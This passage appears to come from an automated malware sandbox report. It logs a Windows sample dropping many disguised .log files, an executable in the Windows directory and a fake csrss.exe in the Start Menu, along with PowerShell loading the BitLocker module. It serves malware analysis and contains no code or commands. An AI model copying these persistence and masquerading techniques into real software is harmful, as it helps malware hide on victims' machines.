Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\YVXcjCmC.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\uuIRZZqN.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\wacGgDMF.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\lFJjObwF.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\WKOtegOK.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\GOHxPPGn.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\LvueRqhB.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\luhiabrd.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\CKigYxxx.log Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hGwsXsdP.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\TcbLgjio.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\KySWwqSG.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\CVKgMxCZ.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\rhfqclHr.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\iDXAsssK.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\owAZVXxy.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\WjYUBCcj.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\LvueRqhB.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\DSloixRU.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\uodzyDCn.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\lFJjObwF.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\bXqTeyrX.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\RoXDuWmq.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\AhGYbjHb.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hPTsHewM.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\XgzcXCre.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\OygMnZlw.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\wlEHTDRh.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\dZcBAhwS.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\TlyLQWBk.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\JCfvgtvD.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\AZWFwAgV.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\rqDqMXbo.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\ajmLslvZ.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\WKOtegOK.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\AHvxDOtC.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\qZchTloU.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\HFjxfdnr.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\nnwRMYdb.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\eFdBcvYu.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\NyMWIIsf.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\CKigYxxx.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\lCRBFKSi.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\jsvAFsni.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\aOmKVzXA.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\ICLFBdCl.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\zZCPRjnE.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\hMaKxNSp.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\OvoeeIHa.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\wiMZKnmL.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\luhiabrd.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\UnQDGoMO.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\ssViDqmS.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\YVXcjCmC.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\GOHxPPGn.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\wacGgDMF.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\fTLbMRgr.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\DYQGISGu.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\uuIRZZqN.log Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default User\Start Menu\Programs\Accessories\886983d96e3d3e Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
